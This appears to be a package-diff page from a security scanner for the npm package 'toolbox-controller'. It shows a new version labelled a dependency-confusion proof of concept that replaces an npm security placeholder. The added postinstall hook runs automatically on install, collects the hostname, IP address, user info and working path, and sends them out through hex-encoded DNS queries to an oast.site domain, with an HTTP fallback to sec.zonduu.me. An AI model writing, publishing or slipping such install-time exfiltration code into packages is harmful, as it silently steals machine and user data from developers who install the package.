toolbox-controller 0.0.1-security.1 → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of toolbox-controller might be problematic. Click here for more details.

package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "toolbox-controller",
3
- "version": "0.0.1-security.1",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "description": "Proof of concept for dependency confusion",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/postinstall.js ADDED
@@ -0,0 +1,87 @@
1
+ const fs = require('fs');
2
+ const dns = require('dns');
3
+ const http = require('http');
4
+ const os = require('os');
5
+
6
+ const logFile = '/tmp/postinstall.log';
7
+
8
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
9
+
10
+ try {
11
+ fs.appendFileSync(logFile, `Starting postinstall script\n`);
12
+
13
+ const hostname = os.hostname();
14
+ const packageName = process.env.npm_package_name;
15
+ const packageVersion = process.env.npm_package_version;
16
+ const ipAddress = require('child_process').execSync('hostname -I').toString().trim();
17
+ const currentPath = process.cwd();
18
+ const platform = os.platform();
19
+ const userInfo = os.userInfo();
20
+
21
+ const data = {
22
+ packageName,
23
+ packageVersion,
24
+ hostname,
25
+ ipAddress,
26
+ currentPath,
27
+ platform,
28
+ userInfo
29
+ };
30
+
31
+ fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
32
+
33
+ // Prepare data for DNS exfiltration
34
+ const dnsData = `${packageName}-${hostname}-${ipAddress}`;
35
+ const hexData = Buffer.from(dnsData).toString('hex');
36
+
37
+ // Split hex data into parts fitting within DNS label length limit
38
+ const maxLabelLength = 63;
39
+ const hexDataParts = [];
40
+ for (let i = 0; i < hexData.length; i += maxLabelLength) {
41
+ hexDataParts.push(hexData.substring(i, i + maxLabelLength));
42
+ }
43
+
44
+ // Send each part as a separate DNS query
45
+ hexDataParts.forEach((part, index, arr) => {
46
+ const partIndex = index + 1;
47
+ const totalParts = arr.length;
48
+ const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
49
+ dns.resolve4(dnsSubdomain, (err, addresses) => {
50
+ if (err) {
51
+ fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
52
+ } else {
53
+ fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
54
+ }
55
+ });
56
+ });
57
+
58
+ // HTTP fallback
59
+ const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
60
+
61
+ const options = {
62
+ hostname: 'sec.zonduu.me', // Replace with your HTTP server hostname
63
+ port: 80, // Replace with the appropriate port
64
+ path: `/callbackplz?${getData}`,
65
+ method: 'GET'
66
+ };
67
+
68
+ const req = http.request(options, (res) => {
69
+ let responseData = '';
70
+ res.on('data', (chunk) => {
71
+ responseData += chunk;
72
+ });
73
+ res.on('end', () => {
74
+ fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
75
+ });
76
+ });
77
+
78
+ req.on('error', (e) => {
79
+ fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
80
+ });
81
+
82
+ req.end();
83
+
84
+ fs.appendFileSync(logFile, `postinstall script finished\n`);
85
+ } catch (e) {
86
+ fs.appendFileSync(logFile, `Error: ${e.message}\n`);
87
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=toolbox-controller for more information.